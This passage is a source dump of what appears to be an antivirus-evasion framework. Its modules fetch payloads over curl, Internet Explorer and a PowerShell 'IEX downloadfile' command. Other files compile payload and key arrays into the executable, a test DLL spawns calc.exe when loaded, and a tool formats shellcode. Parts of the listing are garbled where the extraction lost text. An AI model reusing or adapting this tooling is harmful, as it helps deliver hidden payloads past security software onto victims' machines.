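        return NULL;
    }
    strcpy(sh_filename, url_filename);

    DEBUG_PRINT("sh_filename = %s\n", sh_filename);

    // Build the curl command line; refuse to run a truncated one rather than a mangled one.
    char download[500];
    int written = snprintf(download, sizeof(download), "curl.exe %s -o %s", arg1, sh_filename);
    if(written < 0 || (size_t) written >= sizeof(download)) {
        DEBUG_PRINT("Command line does not fit into the buffer.\n");
        *data_size = 0;
        return NULL;
    }

    DEBUG_PRINT("command: %s\n", download);
    system(download);
    DEBUG_PRINT("Download done.\n");

    *data_size = get_filesize(sh_filename);
    return load_textfile(sh_filename, *data_size);
}

--------------------------------------------------------------------------------
/source/implementations/retrieve_data/download_internet_explorer.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include "../debug_print/debug_print.h"
#include "helper_functions/helper_functions.h"


// return pointer to the filename
//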
// string = url
// Drives Internet Explorer to fetch 'string', then locates the cached copy under the user
// profile with a cmd.exe "dir | find" search and returns its path.
// NOTE(review): sharp edges left untouched because the flow (ShellExecute + fixed sleeps +
// asynchronous cmd.exe search) is timing dependent and hard to restyle safely:
//  - strtok() rewrites 'string' in place, so the caller's URL is destroyed;
//  - 'fname' is uninitialized if the URL contains no '/';
//  - none of the strcat chains into the 150/500-byte buffers is bounded;
//  - if datafile.txt never appears, size stays 0 and sh_filename[-2] is written.
// Returns the buffer from load_textfile (caller-owned) holding the found path.
char* ie_download(char* string) {
    // Launch "<PROGRAMFILES>\Internet Explorer\iexplore.exe <url>".
    char ie[500];
    GetEnvironmentVariable("PROGRAMFILES",ie,100);
    strcat(ie,"\\Internet Explorer\\iexplore.exe");
    ShellExecute(0, "open", ie , string, NULL, SW_SHOWDEFAULT);

    // wait a little until the file is loaded
    Sleep(8000);

    // get the filename to search format in the ie temp directory
    // (last '/'-separated component of the URL)
    char delimiter[] = "/";
    char *ptr;
    char *fname;
    ptr = strtok(string, delimiter);
    while(ptr != NULL)
    {
        fname = ptr;
        ptr = strtok(NULL, delimiter);
    }

    DEBUG_PRINT("ie_download, filename: %s\n", fname);

    // split the filename: the part before the first '.' becomes the search key
    char delimiter2[] = ".";
    char *sname;
    ptr = strtok(fname, delimiter2);
    sname = ptr;
    ptr = strtok(NULL, delimiter2);

    DEBUG_PRINT("ie_download, name to search for: %s\n", sname);

    // search for the file in user profile

    // build searchstring
    char tmp[150];
    char tmp_home[150];
    GetEnvironmentVariable ("USERPROFILE",tmp_home,150);
    GetEnvironmentVariable ("TEMP",tmp,150);
    // cuts the last 5 characters off %TEMP% (presumably "\Temp", to search from ...\Local) — TODO confirm
    tmp [ strlen(tmp) - 5 ] = 0x0;
    //printf("\n\n%s\n\n",tmp);
    // cmd.exe /C <drive>: && cd "<dir>" && dir . /s /b | find "<sname>" > "<profile>\datafile.txt"
    char searchstring[500] = "/C ";
    strncat (searchstring,tmp_home,1);
    strcat (searchstring,": && cd \"");
    strcat (searchstring,tmp);
    strcat (searchstring,"\" && dir . /s /b | find \"");
    strcat (searchstring,sname);
    strcat (searchstring,"\" > \"");
    strcat (searchstring,tmp_home);
    strcat (searchstring,"\\datafile.txt\"");

    DEBUG_PRINT("ie_download, searchstring: %s\n", searchstring);

    // build & execute cmd
    // ('cmd' is assembled but the ShellExecute below passes the bare "cmd.exe" name)
    char cmd[500];
    GetEnvironmentVariable ("WINDIR",cmd,500);
    strcat (cmd,"\\system32\\cmd.exe");
    ShellExecute (0, "open", "cmd.exe" , searchstring, NULL, SW_SHOWDEFAULT);

    //now read the directory + filename from the textfile
    // poll (1001 x 500 ms, ~8 min) until the asynchronous search has produced a non-empty file
    char dirfile[500] = {0};
    strcat (dirfile, tmp_home);
    strcat (dirfile, "\\datafile.txt");
    char *sh_filename;
    int size_sh_filename=0;
    int counter = 0;
    while(size_sh_filename==0 && counter <= 1000)
    {
        size_sh_filename = get_filesize (dirfile);
        Sleep(500);
        counter++;
    }

    sh_filename = load_textfile (dirfile, size_sh_filename);
    // there is always empty space at the end of the file -> delete that
    sh_filename[size_sh_filename-2]=0x0;

    DEBUG_PRINT("ie_download, sh_filename: >>>%s<<<, size: %d\ntest\n", sh_filename, size_sh_filename);

    return sh_filename;
}


// Retrieval of data via IE download to file. The data is then read from the file and returned.
//
// arg1 specifies the URL to download the file from.
// data_size receives the size of the data in bytes.
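unsigned char* download_internet_explorer(char *arg1, int *data_size) {
    DEBUG_PRINT("This is download_internet_explorer.\n");
    DEBUG_PRINT("exec data from url\n");

    // ie_download hands back a load_textfile() buffer with the located path; it was never
    // released before, so free it once the file content has been read.
    char *sh_filename = ie_download(arg1);
    *data_size = get_filesize(sh_filename);
    unsigned char *data = load_textfile(sh_filename, *data_size);
    free(sh_filename);
    return data;
}

--------------------------------------------------------------------------------
/source/implementations/retrieve_data/download_powershell.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include
#include "../debug_print/debug_print.h"
#include "helper_functions/helper_functions.h"


// Downloads data from the URI specified in arg1 into a file.
// The data is then read from the file and returned.
//
// arg1: URL; the part after the last '/' names the local file, and both are spliced
//       into a powershell.exe command line (no quotes or shell metacharacters).
// data_size receives the size of the data in bytes.
unsigned char* download_powershell(char *arg1, int *data_size) {
    DEBUG_PRINT("Downloading data to file via powershell...\n");

    char sh_filename[128];
    char *url_filename = get_filename_from_url(arg1);
    // Bound the copy: a long URL tail would otherwise run past the 128-byte buffer.
    if(strlen(url_filename) >= sizeof(sh_filename)) {
        DEBUG_PRINT("File name from URL is too long.\n");
        *data_size = 0;
        return NULL;
    }
    strcpy(sh_filename, url_filename);

    DEBUG_PRINT("sh_filename = %s\n", sh_filename);

    char download[500]; //how not to do it...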
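    // Build the powershell command line; refuse to run a truncated one rather than a mangled one.
    int written = snprintf(download, sizeof(download), "powershell.exe \"IEX ((new-object net.webclient).downloadfile('%s','%s'))\"", arg1, sh_filename);
    if(written < 0 || (size_t) written >= sizeof(download)) {
        DEBUG_PRINT("Command line does not fit into the buffer.\n");
        *data_size = 0;
        return NULL;
    }

    DEBUG_PRINT("command: %s\n", download);
    system(download);
    DEBUG_PRINT("Download done.\n");

    *data_size = get_filesize(sh_filename);
    return load_textfile(sh_filename, *data_size);
}

--------------------------------------------------------------------------------
/source/implementations/retrieve_data/dynamic_from_file.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include "../debug_print/debug_print.h"
#include "helper_functions/helper_functions.h"


// Dynamic retrieval of data from file
// Dynamic in this context means that the data is not statically compiled into the executable,
// but instead is retrieved from a file at run time.
//
// arg1 specifies the filename to fetch the data from.
// data_size receives the size of the data in bytes; get_filesize reports 0 for a file
// that cannot be opened, so callers should treat data_size == 0 as "nothing retrieved".
// Returns the buffer allocated by load_textfile (owned by the caller).
unsigned char *dynamic_from_file(char *arg1, int *data_size) {
    // First command line argument specifies the file name to read from
    char *filename = arg1;

    DEBUG_PRINT("Dynamically retrieving data from file %s...\n", filename);

    *data_size = get_filesize(filename);
    // Memory allocation is handled by load_textfile
    return load_textfile(filename, *data_size);
}

--------------------------------------------------------------------------------
/source/implementations/retrieve_data/from_command_line_hex.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include "../debug_print/debug_print.h"


// Retrieves data from a "11aabb22..." format hex string given by arg1.
// Can be used to retrieve data of such format from the command line if arg1 = argv[1].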
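//
// data_size receives the size of the data in bytes (input_length / 2; a trailing odd nibble is dropped).
// Returns a malloc'd buffer owned by the caller, or NULL if allocation fails.
unsigned char *from_command_line_hex(char *arg1, int *data_size) {
    DEBUG_PRINT("Retrieving data from command line arguments, expecting hex format...\n");
    // Get input string length
    int input_length = strlen(arg1);

    // Convert ASCII hex string into raw bytes
    char current_hex[5] = "0xaa";

    // Each data byte is represented by 2 ASCII symbols
    *data_size = input_length / 2;
    unsigned char *data = (unsigned char *) malloc(*data_size);
    if(data == NULL) {
        DEBUG_PRINT("Allocation of %d bytes failed.\n", *data_size);
        *data_size = 0;
        return NULL;
    }

    // Hex string is of format aabb01cc34...
    // Each loop iteration handles a 2-character chunk. The loop must run data_size times,
    // not input_length times: the old bound wrote twice as many bytes as were allocated
    // (heap overflow) and read up to 2*input_length characters past the end of arg1.
    char *endptr; // Required by strtoul function

    for(int j = 0; j < *data_size; j++) {
        // Interpret hex representation as unsigned char value
        memcpy(&(current_hex[2]), &(arg1[2 * j]), 2);
        data[j] = (unsigned char) strtoul(current_hex, &endptr, 16);
    }

    return data;
}

--------------------------------------------------------------------------------
/source/implementations/retrieve_data/from_command_line_raw.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include "../debug_print/debug_print.h"


// Retrieves data from the command line.
// The given ASCII string is interpreted as raw byte data.
// Can be used to retrieve data of such format from the command line if arg1 = argv[1].
//
// data_size receives the size of the data in bytes.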
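unsigned char *from_command_line_raw(char *arg1, int *data_size) {
    DEBUG_PRINT("Retrieving data from command line arguments, expecting raw ASCII format...\n");
    // Get input string length (the NUL is not copied: the result is raw bytes, not a C string)
    *data_size = strlen(arg1);

    // Interpret as raw data and copy into new allocated buffer
    unsigned char *data = (unsigned char *) malloc(*data_size);
    if(data == NULL) {
        DEBUG_PRINT("Allocation of %d bytes failed.\n", *data_size);
        *data_size = 0;
        return NULL;
    }
    memcpy(data, arg1, *data_size);

    return data;
}

--------------------------------------------------------------------------------
/source/implementations/retrieve_data/helper_functions/helper_functions.h:
--------------------------------------------------------------------------------
#pragma once

#include
#include
#include "../../debug_print/debug_print.h"


// Searches for the last occurrence of the '/' character and returns the string remaining after that last occurrence
// Note that the return value will be pointing to the same string (no copy is made);
// if url contains no '/' at all, url itself is returned.
char *get_filename_from_url(char *url) {
    int index = -1;
    int i = 0;

    while(url[i] != '\0')
    {
        if(url[i] == '/')
        {
            index = i;
        }
        i++;
    }

    return &url[index + 1];
}


// Returns the content size of the file given by fvalue, or 0 if it cannot be opened
// (callers cannot distinguish "missing" from "empty"). Counts byte by byte with getc,
// so it is O(size).
int get_filesize(char *fvalue) {
    int size,rc1;
    FILE *fp1 = fopen(fvalue, "rb");
    if (fp1 == NULL)
    {
        DEBUG_PRINT("get_filesize, %s not found\n", fvalue);
        return 0;
    }
    for (size = 0; (rc1 = getc(fp1)) != EOF; size++) {}
    fclose(fp1);

    DEBUG_PRINT("get_filesize, filesize %s: %d\n", fvalue, size);

    return size;
}


// Returns pointer to buffer that contains the file content
// Automatically allocates memory for this (size + 1 bytes, caller frees)
unsigned char *load_textfile(char *fvalue, int size) {
    DEBUG_PRINT("load_textfile called: fvalue: %s, size: %d\n", fvalue, size);

    // allocate buffer, open file, read file to the buffer, close the file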
    unsigned char *buffer = (unsigned char*) malloc(size+1);
    int i, rc;

    for (i=0; i
    // NOTE(review): the rest of load_textfile's body and the first lines of the next
    // header (static_from_file.h) were lost when this listing was extracted — the text
    // after "i<" was swallowed. Refer to the repository for the real code.
#include "../debug_print/debug_print.h"


// Static retrieval of data from file.
// Static in this context means that the data is statically compiled into the executable and therefore fixed after compilation time.
// Data must be copied as a c-style array into get_shellcode.h by the build script.
//
// arg1 specifies which array the data is read from: one of "static_payload", "static_key",
//      "static_payload_info", "static_command"; each is only available when the build
//      script defined the matching STATIC_* macro.
// data_size receives the size of the data in bytes (sizeof the array minus one — presumably
//      the trailing NUL of the generated array; confirm against data_raw_to_c).
// Returns a pointer into the static array (not malloc'd, do not free), or NULL if the
//      name is unknown or its STATIC_* macro was not defined.
unsigned char *static_from_file(char *arg1, int *data_size) {
    // Deliver address and size of array buf[]
    // If payload is retrieved statically, the define is set by the build script to notify this function that array buf[] is declared and known to the compiler.
    #ifdef STATIC_PAYLOAD
    if(strcmp(arg1, "static_payload") == 0) {
        DEBUG_PRINT("Statically retrieving data from array buf[] in included file...\n");
        *data_size = sizeof(buf) - 1;
        return buf;
    }
    #endif
    // Deliver address and size of array key[] if key is requested
    // If the key is retrieved statically, the define is set by the build script to notify this function that array key[] is declared and known to the compiler.
    #ifdef STATIC_KEY
    if(strcmp(arg1, "static_key") == 0) {
        DEBUG_PRINT("Statically retrieving data from array key[] in included file...\n");
        *data_size = sizeof(key) - 1;
        return key;
    }
    #endif
    // Deliver address and size of array payload_info[] if payload info is requested
    // If payload info is retrieved statically, the define is set by the build script to notify this function that array payload_info[] is declared and known to the compiler.
34 | #ifdef STATIC_PAYLOAD_INFO 35 | if(strcmp(arg1, "static_payload_info") == 0) { 36 | DEBUG_PRINT("Statically retrieving data from array payload_info[] in included file...\n"); 37 | *data_size = sizeof(payload_info) - 1; 38 | return payload_info; 39 | } 40 | #endif 41 | // Deliver address and size of array command[] if command is requested 42 | // If command is retrieved statically, the define is set by the build script to notify this function that array command[] is declared and known to the compiler. 43 | #ifdef STATIC_COMMAND 44 | if(strcmp(arg1, "static_command") == 0) { 45 | DEBUG_PRINT("Statically retrieving data from array command[] in included file...\n"); 46 | *data_size = sizeof(command) - 1; 47 | return command; 48 | } 49 | #endif 50 | 51 | // Return NULL if arg1 is unrecognized string or defines are not set correctly 52 | DEBUG_PRINT("Static retrieval from file failed; argument arg1 of function static_from_file not recognized and/or defines not correctly set in included headers?\n"); 53 | return NULL; 54 | } 55 | -------------------------------------------------------------------------------- /source/implementations/retrieve_data/static_from_here.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "static_from_file.h" 4 | 5 | 6 | // Static inclusion of data. 7 | // Data is formatted as array and written into the static_data.include file by the set_*_source function. 8 | // This function wraps static_from_file, as the prodecure is the same. 9 | // 10 | // arg1 specifies which array the data is read from. 11 | // data_size receives the size of the data in bytes. 
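// Thin wrapper around static_from_file(): same arguments, same return contract
// (pointer into static storage that must not be free()d, NULL with *data_size
// set to 0 on failure). The NULL guard here keeps a missing array name from
// reaching strcmp() in the callee.
unsigned char *static_from_here(char *arg1, int *data_size) {
    if (arg1 == NULL) {
        *data_size = 0;
        return NULL;
    }
    return static_from_file(arg1, data_size);
}

/* ------------------------------------------------------------------------------
   /source/payload_execution_method/payload_execution_method.assign:
   ------------------------------------------------------------------------------ */

/* ------------------------------------------------------------------------------
   /source/payload_execution_method/payload_execution_method.include:
   ------------------------------------------------------------------------------ */

/* ------------------------------------------------------------------------------
   /source/static_data/static_data.include:
   ------------------------------------------------------------------------------ */

/* ------------------------------------------------------------------------------
   /test_payloads/exec_calc.c:
   ------------------------------------------------------------------------------ */
#include /* header name lost in page extraction (BOOL/APIENTRY/DWORD come from the Windows headers) */
#include /* header name lost in page extraction */


// Test payload: a DLL that starts calc.exe when it is loaded, used to check that
// a DLL injection/loading method works. The spawn is restricted to
// DLL_PROCESS_ATTACH: per the Windows loader contract DllMain is also called for
// thread attach/detach and process detach, and an unconditional system() call
// starts another calc.exe on each of those events.
// NOTE(review): calling system() from DllMain is tolerable for a throwaway test
// payload only; loader-lock constraints make it a poor pattern for anything else.
BOOL APIENTRY DllMain(HANDLE hModule, DWORD ul_reason_for_call, LPVOID lpReserved) {
    (void) hModule;
    (void) lpReserved;

    if (ul_reason_for_call == DLL_PROCESS_ATTACH) {
        system("calc.exe");
    }
    return TRUE;
}

/* ------------------------------------------------------------------------------
   /tools/data_raw_to_c/data_raw_to_c:
   ------------------------------------------------------------------------------
   https://raw.githubusercontent.com/govolution/avet/6da43bff14a81327143fd67433b821a9c85d99f8/tools/data_raw_to_c/data_raw_to_c
   NOTE(review): this is a prebuilt binary committed next to its source; treat it
   as untrusted and rebuild from data_raw_to_c.c rather than running the checked-in file. */

/* ------------------------------------------------------------------------------
   /tools/data_raw_to_c/data_raw_to_c.c:
   ------------------------------------------------------------------------------ */
#include "../../source/data_utility.h"


// Takes raw data as input from a file, converts it into C-array format and writes output to another file.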
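//
// argv[1]: Name of the file to read the raw data from
// argv[2]: Name of the file to write the C-style array into
// argv[3]: Name of the array to write the data into
//
// Exits with status 1 (and a message on stderr) if fewer than three arguments
// are given or the input file could not be read; 0 otherwise.
#include <stdio.h>   /* fprintf/stderr for the diagnostics below; harmless if already included */

int main(int argc, char **argv) {
    const char *prog = (argc > 0 && argv[0] != NULL) ? argv[0] : "data_raw_to_c";
    if (argc < 4) {
        fprintf(stderr, "usage: %s <raw_input_file> <c_output_file> <array_name>\n", prog);
        return 1;
    }

    int data_size = 0;
    unsigned char *data = data_from_file_raw(argv[1], &data_size);
    // NOTE(review): assumes data_from_file_raw() returns NULL when the file
    // cannot be read -- confirm against data_utility.h.
    if (data == NULL) {
        fprintf(stderr, "%s: could not read raw data from '%s'\n", prog, argv[1]);
        return 1;
    }

    data_to_file(data, data_size, argv[2], argv[3]);
    return 0;
}

/* ------------------------------------------------------------------------------
   /tools/generate_key/generate_key:
   ------------------------------------------------------------------------------
   https://raw.githubusercontent.com/govolution/avet/6da43bff14a81327143fd67433b821a9c85d99f8/tools/generate_key/generate_key
   NOTE(review): prebuilt binary committed next to its source; rebuild from
   generate_key.c rather than trusting the checked-in file. */

/* ------------------------------------------------------------------------------
   /tools/generate_key/generate_key.c:
   ------------------------------------------------------------------------------ */
#include /* header name lost in page extraction */
#include /* header name lost in page extraction */
#include /* header name lost in page extraction */
#include /* header name lost in page extraction */
#include "../../source/data_utility.h"


// Generates a key_length-byte pseudo-random byte sequence.
//
// SECURITY NOTE: this uses rand() seeded with the current second, which is not
// a cryptographic generator -- anyone who knows (or can brute-force) the time
// the key was made can reproduce it, and two keys of the same length generated
// within the same second are identical. That may be tolerable for the
// payload-obfuscation keys this tool appears to produce for the build scripts,
// but such a key must not be relied on for confidentiality.
//
// Memory for the key is allocated here and owned by the caller (free() it).
// Returns NULL if key_length <= 0 or the allocation fails.
unsigned char *generate_key(int key_length) {
    if (key_length <= 0) {
        return NULL;
    }

    unsigned char *key = malloc((size_t) key_length);
    if (key == NULL) {
        return NULL;
    }

    srand((unsigned) time(NULL));
    for (int i = 0; i < key_length; i++) {
        // rand() yields a non-negative int; keep its low byte.
        key[i] = (unsigned char) (rand() & 0xff);
    }

    return key;
}


// Retrieves data from a "11aabb22..." format hex string given by arg1.
//
// data_size receives the size of the data in bytes.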
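// The input is a hex string of format aabb01cc34... in which every byte is
// given by exactly two hex digits (upper or lower case, no "0x" prefix, no
// separators). Returns a newly allocated buffer of strlen(arg1) / 2 bytes that
// the caller owns and must free(); data_size receives that byte count.
//
// Returns NULL and sets *data_size to 0 if arg1 is NULL or empty, has an odd
// number of characters, contains a non-hex character, or the allocation fails.
// A malformed preset key is rejected rather than silently turned into
// different key material. The loop runs once per byte pair, not once per input
// character, so every read stays inside arg1 and every write inside data.
unsigned char *from_command_line_hex(char *arg1, int *data_size) {
    *data_size = 0;
    if (arg1 == NULL) {
        return NULL;
    }

    size_t input_length = strlen(arg1);
    if (input_length == 0 || input_length % 2 != 0) {
        return NULL;
    }

    size_t byte_count = input_length / 2;
    unsigned char *data = malloc(byte_count);
    if (data == NULL) {
        return NULL;
    }

    for (size_t i = 0; i < byte_count; i++) {
        unsigned value = 0;
        for (int k = 0; k < 2; k++) {
            char c = arg1[2 * i + k];
            int nibble;
            if (c >= '0' && c <= '9') {
                nibble = c - '0';
            } else if (c >= 'a' && c <= 'f') {
                nibble = c - 'a' + 10;
            } else if (c >= 'A' && c <= 'F') {
                nibble = c - 'A' + 10;
            } else {
                free(data);
                return NULL;
            }
            value = (value << 4) | (unsigned) nibble;
        }
        data[i] = (unsigned char) value;
    }

    *data_size = (int) byte_count;
    return data;
}


// Key generation utility. Generates either a random key or takes a preset key,
// and outputs the raw (!!!) key data into a specified file.
// Arguments expected:
//
// argv[1]: (random|preset)
//          Random: Generates a random byte sequence. Sequence length in bytes is specified in argv[2].
//          Preset: Allows to enter a preset key via argv[2]. Input format is a hex string, such as aabbccdd...
// argv[2]: Either specifies key length in bytes, or a preset key via hex string, depending on argv[1] choice.
// argv[3]: Name of the output file to write generated raw key data into.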
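#include <stdio.h>   /* diagnostics on stderr; harmless if already included above */

// Prints the accepted invocations to stderr.
static void print_usage(const char *prog) {
    fprintf(stderr,
            "usage: %s random <key_length_bytes> <output_file>\n"
            "       %s preset <hex_key_string> <output_file>\n",
            prog, prog);
}

// Entry point: see the argument description above. Exits with status 1 on a
// missing/unknown mode, an unparsable or non-positive key length, a malformed
// preset key string, or an allocation failure; 0 after the key was handed to
// data_to_file_raw().
// NOTE(review): data_to_file_raw()'s return value (if it has one) is not
// checked here; confirm in data_utility.h whether it reports write failures.
int main(int argc, char **argv) {
    const char *prog = (argc > 0 && argv[0] != NULL) ? argv[0] : "generate_key";
    if (argc < 4) {
        print_usage(prog);
        return 1;
    }

    int key_length = 0;
    unsigned char *key = NULL;

    if (strcmp(argv[1], "random") == 0) {
        // Parse the length strictly: the NULL-endptr form of strtol turns
        // garbage into 0, which used to produce an empty key without complaint.
        char *end = NULL;
        long requested = strtol(argv[2], &end, 10);
        if (end == argv[2] || *end != '\0' || requested <= 0 || (long) (int) requested != requested) {
            fprintf(stderr, "%s: invalid key length '%s'\n", prog, argv[2]);
            return 1;
        }
        key_length = (int) requested;
        key = generate_key(key_length);
    } else if (strcmp(argv[1], "preset") == 0) {
        key = from_command_line_hex(argv[2], &key_length);
    } else {
        print_usage(prog);
        return 1;
    }

    if (key == NULL || key_length <= 0) {
        fprintf(stderr, "%s: could not obtain key material from '%s'\n", prog, argv[2]);
        return 1;
    }

    // Write raw key data to output file
    data_to_file_raw(key, key_length, argv[3]);
    free(key);
    return 0;
}

/* ------------------------------------------------------------------------------
   /tools/sh_format/sh_format:
   ------------------------------------------------------------------------------
   https://raw.githubusercontent.com/govolution/avet/6da43bff14a81327143fd67433b821a9c85d99f8/tools/sh_format/sh_format
   NOTE(review): prebuilt binary committed next to its source; rebuild from
   sh_format.c rather than trusting the checked-in file. */

/* ------------------------------------------------------------------------------
   /tools/sh_format/sh_format.c:
   ------------------------------------------------------------------------------ */
//./sh_format rev.txt | tr -d "\n" | tr -d "x" | tr -d "\\" | tr -d "\"" | tr -d ";"

#include /* header name lost in page extraction */
#include /* header name lost in page extraction */

// Filters a C-source rendering of shellcode (e.g. the kind in rev.txt above):
// echoes every input line that begins with a double quote and stops once the
// second line beginning with 'u' has been seen (presumably the declarations
// that frame the array -- confirm against the expected input). The pipeline in
// the first-line comment then strips the remaining C syntax.
// Lines longer than 499 characters are split by fgets() and only the chunk that
// happens to start with '"' would be echoed; the input is expected to be short-lined.
// argv[1] is the input file name. Exits with 1 (usage on stderr) if it is
// missing, or with 1 after perror() if the file cannot be opened; 0 otherwise.
int main (int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "usage: %s <shellcode_c_file>\n", (argc > 0 && argv[0] != NULL) ? argv[0] : "sh_format");
        return 1;
    }

    char *filename = argv[1];
    FILE *file = fopen(filename, "r");
    if (file == NULL) {
        perror(filename);
        return 1;
    }

    char line[500];
    int declarations_seen = 0;
    // Keep reading while at most one 'u'-line has been consumed.
    while (declarations_seen <= 1 && fgets(line, sizeof line, file) != NULL) {
        if (line[0] == 'u') {
            declarations_seen++;
        } else if (line[0] == '"') {
            fputs(line, stdout);
        }
    }
    fclose(file);
    return 0;
}
/* ------------------------------------------------------------------------------ */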